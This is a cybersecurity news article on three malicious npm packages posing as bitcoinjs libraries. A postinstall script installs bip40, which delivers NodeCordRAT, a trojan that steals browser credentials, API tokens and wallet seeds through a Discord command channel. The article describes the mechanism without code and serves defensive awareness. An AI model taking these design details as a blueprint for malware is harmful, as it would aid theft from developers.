Listen to this Post
Introduction
A newly uncovered supply-chain attack has sent shockwaves through the JavaScript developer community. Cybersecurity researchers have identified three malicious npm packages that secretly distribute a previously unknown malware strain called NodeCordRAT. Disguised as legitimate Bitcoin-related libraries, these packages targeted unsuspecting developers, potentially compromising their systems, browser data, and cryptocurrency wallets. The discovery highlights the growing risk of dependency-based attacks in modern software development.
the Original
Cybersecurity analysts from Zscaler ThreatLabz discovered three malicious npm packages designed to deliver NodeCordRAT, a remote access trojan (RAT) capable of stealing sensitive data. The affected packages, uploaded by a user named “wenmoonx,” were:
bitcoin-main-lib (2,300 downloads)
bitcoin-lib-js (193 downloads)
bip40 (970 downloads)
As of November 2025, all three packages have been removed from npm.
The infection chain begins when developers install either bitcoin-main-lib or bitcoin-lib-js. These packages contain a hidden postinstall.cjs script that automatically runs during installation. This script secretly installs bip40, which holds the malicious payload.
Researchers named the malware NodeCordRAT due to its propagation through npm and its use of Discord servers for command-and-control (C2) communication. Once installed, the malware can steal:
Google Chrome login credentials
API tokens
Cryptocurrency seed phrases
MetaMask wallet data
The attackers intentionally named the packages to resemble legitimate Bitcoin-related libraries from the bitcoinjs project, such as bitcoinjs-lib, bip32, and bip38. This impersonation tactic helped trick developers into trusting and installing the malicious code.
NodeCordRAT fingerprints infected systems across Windows, macOS, and Linux to generate a unique device ID. It then connects to a hard-coded Discord server, opening a covert channel to receive commands.
The malware supports several attacker commands:
!run – execute arbitrary shell commands
!screenshot – capture full desktop screenshots
!sendfile – upload specified files
All stolen data is exfiltrated using Discord’s API with a hard-coded authentication token. Files are uploaded as message attachments to a private Discord channel via the endpoint /channels/{id}/messages. This stealthy communication method helps attackers evade traditional security detection tools.
What Undercode Say:
This incident exposes a brutal truth about modern software development: your dependencies are your biggest security risk. Developers often blindly trust npm packages, assuming that popular or Bitcoin-related names guarantee legitimacy. Attackers clearly understand this psychology and weaponize it.
What makes NodeCordRAT particularly dangerous is its silent execution model. The malware activates automatically during installation, meaning victims don’t even need to run the software. Simply installing the package is enough to compromise the system.
The use of Discord as a C2 server is especially alarming. Many companies allow Discord traffic through firewalls, making it an ideal stealth channel for cybercriminals. This trend is growing rapidly, and security teams must start treating social platforms as potential malware infrastructure.
Another red flag is typosquatting and brand impersonation. The attacker deliberately mimicked trusted Bitcoin libraries to lure developers. This tactic has become one of the most effective supply-chain attack strategies in recent years.
The real danger lies in the target data:
Crypto wallet seed phrases
API keys
Browser credentials
This means attackers can empty wallets, hijack accounts, and breach corporate systems with a single infection. The financial damage could be devastating.
From a broader perspective, this attack proves that open-source ecosystems are under siege. npm remains one of the most abused package repositories, with thousands of malicious libraries discovered each year.
Developers must start practicing:
Dependency auditing
Package signature verification
Minimal dependency usage
Manual code reviews before installation
Organizations should deploy:
Runtime behavioral analysis
Network traffic monitoring
Installation sandboxing
NodeCordRAT also demonstrates how malware is becoming cross-platform by default. Supporting Windows, macOS, and Linux ensures maximum infection reach.
The attackers’ operational security is improving. Using Discord APIs, private channels, and hard-coded tokens shows a well-planned infrastructure. This is no amateur operation.
This campaign also reflects a shift in cybercrime priorities:
Crypto theft is now the primary objective.
We are witnessing the evolution of malware from traditional ransomware to silent wallet drainers and credential harvesters. These attacks often go unnoticed until victims realize their funds are gone.
If this trend continues, we can expect:
More fake developer tools
More Discord-based malware
More crypto-targeted RATs
Supply-chain security is no longer optional. It must become a core development principle.
🔍 Fact Checker Results
✅ The malicious packages were real and removed from npm
✅ NodeCordRAT uses Discord for command-and-control
❌ No evidence suggests the attack targeted only crypto developers
📊 Prediction
We predict a surge in fake npm libraries impersonating popular frameworks over the next year. Attackers will increasingly exploit developer trust, with Discord, Telegram, and Slack becoming primary malware control channels. Expect more crypto-focused malware campaigns as digital asset adoption continues to rise.
🕵️📝✔️Let’s dive deep and fact‑check.
References:
Reported By: thehackernews.com
Extra Source Hub (Possible Sources for article):
https://www.linkedin.com
Wikipedia
OpenAi & Undercode AI
Image Source:
Unsplash
Undercode AI DI v2
Bing
🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]
📢 Follow UndercodeNews & Stay Tuned:
𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky | 🐘Mastodon
